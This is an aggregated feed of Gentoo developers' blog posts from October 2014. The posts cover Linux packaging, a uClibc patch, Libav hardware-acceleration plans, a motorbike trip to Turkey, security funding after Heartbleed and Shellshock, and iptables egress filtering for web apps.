But just to make that clear: yes, I did use offline editing for a while back then, as Typo's editor had been overly sensitive to changes too many times. But it does not scale. I'm not always on the same device: not only do I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on and so forth.

Yes, I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great if you end up having one of the devices offline by mistake — better than its effects on password syncs, but not so much better. Indeed I have had bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.

October 15, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this documentary today…

https://archive.org/details/TheInternetsOwnBoyTheStoryOfAaronSwartz

October 14, 2014
Jan Kundrát a.k.a. jkt (homepage, bugs)

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to stop working with upstream and instead focus on a standalone, long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem, and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
One month in Turkey (October 14, 2014, 20:35 UTC)

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)

Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 km to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike, even though we clearly didn't go easy on her. We rode on gravel, dirt and mud without her complaining, not to mention the weight of our luggage and the passengers ;)

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and freedom feeling you get when travelling in motorbike so I hope those first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.

IMG_20140905_130004

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

IMG_20140906_164101  IMG_20140906_191845

Kos is quite a big island that you can discover best by … riding around !

IMG_20140907_121148

After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.

IMG_20140909_180844

This is a view from the Bozburun bay. Two photos for two bike layouts : beach version and fully loaded version ;)

IMG_20140909_191337 IMG_20140910_112858

On the way to Cappadocia, near Karapinar :

IMG_20140918_142943

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.

IMG_20140920_140433 IMG_20140920_174936 IMG_20140921_130308

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.

IMG_20140925_182326

October 13, 2014
Raúl Porcel a.k.a. armin76 (homepage, bugs)
S390 documentation in the Gentoo Wiki (October 13, 2014, 08:44 UTC)

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there weren't any materials available to install Gentoo on an S390 system without having to rely on an already installed distribution.

Thanks to Marist College, IBM and the Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials on their procedure.

So for most of last year and the last few weeks I've been polishing and finishing the documentation I had around. What I've documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both follow the same pattern.

Gentoo S390 on the Hercules emulator

This is probably the guide that will be the more interesting of the two, because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, much like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system on a non-S390 system, while Hercules can.

So if you want to have some fun and emulate a S390 machine in your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo system working. Thanks to Dave Jones I was able to create the guide and test the release materials; he even did a presentation at the 2013 VM Workshop! Link to the PDF. Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuilds stage3 for s390, but we lacked a boot environment for installing Gentoo. This boot environment/release material is simply a kernel and an initramfs built with Gentoo's genkernel, based on busybox. It provides a busybox environment like the LiveCD on amd64/x86 or other architectures. I've integrated the build of this boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!


October 11, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
VDD14 Discussions: HWAccel2 (October 11, 2014, 14:47 UTC)

I took part in the VideoLAN Dev Days 14 a few weeks ago; sadly I have been too busy, so the posts about it will appear in scattered order and somewhat delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers to get pixels, or crunching pixels to get numbers. Most of the operations are quite time consuming on a general-purpose CPU, and orders of magnitude faster if done using a DSP or hardware designed for that purpose.

Availability

Most of the commonly used systems have video decoding and encoding capabilities, either embedded in the GPU or in separate hardware. Leveraging them spares lots of CPU cycles, and lots of battery if we are thinking about mobile.

Capabilities

The usually specialized hardware has the issue of being inflexible, and that clashes with the fact that most codecs evolve quite quickly, with additional profiles to extend their capabilities, support for different color spaces, additional encoding strategies and such. Software decoders and encoders are still needed, and needed badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction addressing short term problems and not really documenting how to use it.

As a result, all the people that dared to use it had to guess, usually used internal symbols that they shouldn't have had to use, and all in all had to spend lots of time and got plenty of grief when such internals changed.

Usage

Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring to override get_format and get_buffer in some ways.

Overall, to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice, considering people use libraries to abstract complexity and avoid repetition.

Backend support

As that support was written with just slice-based decoders in mind, it expects that every backend requires the software decoder to parse the bitstream, prepare slices of the frame and feed them to the backend.

Sadly, new backends appeared that take either the bitstream or full frames directly; the approach so far had been just to take the slices, add back the bitstream markers the backend library expects, and be done with it.

Initial HWAccel 2 discussion

Last year, since the backends I wanted to support were all bitstream-oriented and did not fit the model at all, I started thinking about it, and the topic got discussed a bit during VDD 13. Some people who had spent their dear time getting hwaccel1 working with their software were quite wary of radical changes, so a path of incremental improvements got more or less put down.

HWAccel 1.2

  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv can now use some hwaccels, providing at least an example of how to use them and a means to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels, so at least some mistakes can be avoided (and some code that happens to work by sheer luck won't break once the faulty assumptions cease to exist)

The new VDA backend and the updated VDPAU backend are examples of it.

HWAccel 1.3

  • extend the callback system to decently fit bitstream-oriented backends.
  • provide an example of backend directly providing normal AVFrames.

The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get closer to the end result of not having casual users write boilerplate code to use hwaccel for at least some performance boost, and yet letting power users have full access to the underpinnings, so they can get the most out of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be anymore automagic in this case, but a specific AVERROR_INPUT_CHANGED will be returned so would be cleaner for the user reset the decoder without losing the display that maybe was sharing the same context. This leads the way to a simpler mean to support multiple hwaccel backends and fall back from one to the other to eventually the software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 would in general result in fewer lines of code in the application; people wanting to keep their callbacks just need to set them after avcodec_open2 and move the pixel-specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make managing the backend-specific resources much simpler.

Expected Time of Arrival

Right now the review is on HWAccel 1.3; I hope to complete this step and add a few new backends to test how good or bad that API is before adding the other steps. HWAccel2 will probably take at least another 6 months.

Help in form of code or just moral support is always welcome!

Mike Pagano a.k.a. mpagano (homepage, bugs)
Netflix on Gentoo (October 11, 2014, 13:11 UTC)

Contrary to some articles you may read on the internet, Netflix is working great on Gentoo.

Here's a snapshot of my system running 3.12.30-gentoo sources and Google Chrome version 39.0.2171.19_p1.

netflix

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

October 08, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v1.6 (October 08, 2014, 09:01 UTC)

Back from holidays, this new version of py3status was due for a long time now, as it features a lot of great contributions!

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules :)

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors :

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next ?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love, stay tuned !

October 07, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Two types of respect mixed up by Linus Torvalds (October 07, 2014, 19:59 UTC)

I recently ran into the Q&A with Linus Torvalds @ Debconf 2014 video.

During the session, Torvalds is being criticized for lack of respect and replies that ~”respect is to be earned”. Technically, he confuses respect as in admiration with respect as in dignity. Simplified, he is saying that human dignity does not matter to him. Linus, I’m fairly disappointed.

October 06, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
How to stop Bleeding Hearts and Shocking Shells (October 06, 2014, 21:35 UTC)

The free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs were quite different, I think they still share a lot.

Heartbleed hit the news in April this year: a bug in OpenSSL that allowed extracting the private keys of encrypted connections. When a bug in Bash called Shellshock hit the news, I was at first hesitant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big, there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a man-in-the-middle attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone in the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides they are both quite old, you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However, I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much more secure than it ever was, and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-like bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything extra and look at what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others; we should probably worry more about the ones that are directly involved in providing network services.
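
If you want to repeat the experiment on a Gentoo box, listing what the minimal install pulled in takes a single command (qlist comes from app-portage/portage-utils; the second variant works without any extra tools):

$ qlist -I
$ ls -d /var/db/pkg/*/* | cut -d/ -f5-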

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed, people started having a closer look at OpenSSL and found a number of small issues and one other quite severe one. After the Bash bug, people instantly found more issues in the function parser, and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug, people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info

October 04, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students were writing their exams in Modern OS, I entertained myself by just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it to the point where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground.  uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependent, and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate(), so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate(), so this wasn’t a problem there, even though it is a Linux-specific function and not in any standard.
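
As an aside, a quick way to check whether your libc exports these functions at all is to look at its dynamic symbol table; the library paths here are just examples and will differ per system:

$ nm -D /lib/libc.so.6 | grep -i fallocate                 # glibc
$ nm -D /lib/libuClibc-0.9.33.2.so | grep -i fallocate     # uClibc

If nothing shows up, configure tests like the one e2fsprogs runs will fail, and you end up in fallback code like the snippet above.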

My first approach was to patch e2fsprogs to use posix_fallocate(), which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() with mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o, since he was worried that some libc might implement posix_fallocate() by brute-force writing zeros.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation, but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know it's a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to the patchset that vapier maintains for the uClibc ebuilds.  Since my uClibc stage3s don’t use the 0.9.33 branch HEAD, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pain, but this is exactly the sort of issue I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from experimental/amd64/uclibc on any mirror [11].

October 03, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Does your webapp really need network access? (October 03, 2014, 23:01 UTC)

One of the interesting things that I noticed after shellshock was the amount of probes for the vulnerability that counted on webapp users having direct network access. Not only pings to known addresses just to verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or /dev/tcp connections to give remote shells. The fact that these probes are out there makes it logical to expect that on at least some systems they actually worked.

The reason why this piqued my interest is that I realized most people don't take the one obvious step to mitigate this kind of problem: removing (or at least limiting) their web apps' access to the network. So I decided it might be worth describing for a moment why you should think about that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve responses to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who looked into Java in the early noughties have probably heard the term Application Server, usually present in the form of Apache Tomcat or IBM WebSphere, but essentially the same "actor" exists for Rails apps in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app that talk with the web server to receive user requests and serve back responses. This essentially means that in the basic web interaction, no outbound network access is needed by the application service.

Things get a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly, even my blog needs to talk with some services, either to ping them to tell them that a new post is out, or to check with Akismet whether blog comments might or might not be spam. WordPress plugins that create thumbnails are known to exist, to have a bad history of security, and to fetch external content such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites, to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove network access from your webapp: SELinux, grsecurity RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based on the originating (or destination) user. This of course only works if you can isolate your webapps under separate users, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps into users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.
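
Before relying on the owner match, it might be worth verifying that your kernel actually has it; a couple of ways to check (the first assumes CONFIG_IKCONFIG_PROC is enabled):

$ zgrep NETFILTER_XT_MATCH_OWNER /proc/config.gz
$ modinfo xt_owner        # on modular kernels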

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. Authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. The requirements for phpMyAdmin are pretty similar: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: deny any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user. Both rules are spelled out in the sketch below.
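
Spelled out for both apps (the usernames are just placeholders for whatever users the apps run as), the rules are simply:

iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT
iptables -A OUTPUT -o eth0 -m owner --uid-owner erp -j REJECT

Note that only eth0 is matched, so connections to the local PostgreSQL or MySQL service over the loopback interface or a UNIX socket keep working.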

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly uses HTTP and HTTPS as well. The obvious idea would be to allow ports 80, 443 and 53 (for name resolution). But you can do something better: put a proxy on localhost and force the webapp to go through it, either as a transparent proxy or by using the http_proxy environment variable to convince the webapp never to connect directly to the web (see the sketch below). Unfortunately that is not straightforward to implement, as neither Passenger nor php-fpm has a clean way to pass environment variables per user.
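
As a rough sketch, for a hypothetical "blog" user (the user name is an assumption, not a description of my actual setup), the two variants would look like this:

# coarse: allow only DNS and HTTP(S) outbound, reject everything else
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -p udp --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -p tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -p tcp --dport 443 -j ACCEPT
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -j REJECT

# tighter: reject everything leaving eth0 for that user; the app can then only
# reach the web through a proxy listening on 127.0.0.1 (e.g. port 3128)
iptables -A OUTPUT -o eth0 -m owner --uid-owner blog -j REJECT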

What I've done for now is hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still looking for a solution for PHP, unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it makes two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll soon be shutting down both of those calls since I really don't need them. Indeed, Publify development still seems to go in the "let's add all possible new features that other blogging sites have" direction without considering the actual scalability of the platform. I don't expect to go back to it any time soon.

Anthony Basile a.k.a. blueness (homepage, bugs)

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been updated in about 10 years and there were dozens of accumulated patches in the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done”, whatever that meant, so I was going to tree-clean it.  When I expressed my intentions on the upstream mailing list, I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patches.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mailing list going [3], and set up bugzilla [4].  There hasn’t been much activity, but there was enough that it got noticed by someone who pushed it out to OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world-readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com> from OpenSUSE fixed a possible DoS triggered by a specially crafted .htpasswd.  Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but thttpd's tiny size and speed make it perfect for embedded systems, which are near and dear to my heart.  I also make sure it compiles on *BSD and on Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.

Hanno Böck a.k.a. hanno (homepage, bugs)
New laptop Lenovo Thinkpad X1 Carbon 20A7 (October 03, 2014, 21:05 UTC)

While I got along well with my Thinkpad T61 laptop, for quite some time I had planned to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant, which is very different from the first one, was released in early 2014. To distinguish it from the other models, it is the 20A7 model.

Judging from the first days of use, I think I made the right decision. I hadn't seen the device before I bought it, because it seems shops rarely keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys; instead it has what Lenovo calls an adaptive keyboard: a touch-sensitive strip which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting it display the normal F-keys works well, and not having "real" keys there doesn't feel like a big disadvantage. Besides that, Lenovo removed Caps Lock and placed Pos1/End (Home/End) there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it used to be (small downside), but the </>/| key is where it belongs (big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to the ultrabook / integrated design there is no easy changing of battery, RAM or HD
* No SD card reader
* Some trouble getting used to the touchpad (however, there are lots of possibilities to configure it; I assume that'll get better as I play with it)

It used to be the case that people wrote docs on how to get all the hardware in a laptop running on Linux, which I did for my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernels and xorg packages and most things will be fine". However, I thought having a central place where I collect relevant information would be nice, so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

September 30, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
A little positivity goes a long way (September 30, 2014, 02:59 UTC)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken aback by her comment because it was rather uncommon in this day and age.

